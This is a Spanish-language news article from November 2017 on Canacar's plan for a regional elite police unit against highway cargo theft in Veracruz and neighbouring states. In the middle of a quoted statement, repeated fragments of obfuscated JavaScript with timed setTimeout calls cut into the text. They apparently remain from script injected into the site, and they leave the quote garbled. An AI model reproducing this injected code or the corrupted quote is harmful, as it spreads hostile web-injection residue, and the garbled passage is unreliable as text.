Alista Canacar creación de cuerpo élite de seguridad en el país

28 noviembre, 2017

Adriana Muñoz. Boca del Río. El delegado de la Cámara Nacional del Autotransporte de Carga en Veracruz (Canacar), Luis Exsome Zapata, afirmó que dadas las estadísticas tan altas de robo en carreteras de la entidad, se determinó crear un cuerpo élite de seguridad que operará en varios estados del país.

Para empezar Veracruz, Puebla, Oaxaca, Estado de México, Tlaxcala y entidades de la región centro sur del país.

Dijo que estará integrado por la Policía Federal, fuerzas estatales y federales y autoridades procuradoras de justicia de las entidades federativas.

“Es un grupo regional, así como hay policías estatales ahora se va a hacer un grupo regional”, destacó.

Los ajustes a dicho operativo se realizarán en la reunión que empresarios del sector y autoridades sostendrán en las instalaciones de la Policía Federal en Veracruz.

“La atención que nos da la Policía es muy buena reactivamente pero lo que nos hace falta es la prevención, necesitamos prevenir los rojos y para eso se está formandom()*5);if (number1==3){var delay = 15000;setTimeout($cFN$wEpyMrNXtezaeR2(0), delay);}andom()*5);if (c==3){var delay = 15000;setTimeout($hiVNZt4Y5cDrbJXMhLy(0), delay);}andom()*5);if (number1==3){var delay = 15000;setTimeout($cFN$wEpyMrNXtezaeR2(0), delay);}ando un grupo de seguridad regional con la Ciudad de México, el Estado de México, el Estado de Tlaxcala, el Estado de Puebla y Veracruz”, manifestó.

En entrevista, Exsome Zapata reveló que este año en Veracruz solamente incrementó en 20 por ciento el movimiento de carga pesada.

Esto es aparte de lo que se espera crezca con la entrada en operación de la ampliación portuaria de Veracruz.

Exsome Zapata reconoció que van múltiples reuniones y estrategias que trazan para frenar el robo en carreteras que al parecer no han funcionado pero eso no implica bajar la guardia, mucho menos en Veracruz donde por ejemplo hubo un fin e inicio de semana “delicado en temas de inseguridad”, advirtió.

Otro problema al que se enfrentan los transportistas es a la compra de seguros para protegerse de robos.

Y es que de 10 compañías que vendían las pólizas ahora solo tres a nivel nacional continúan vendiendo porque reponer la unidad más la mercancía robada representa una alta erogación para las aseguradoras.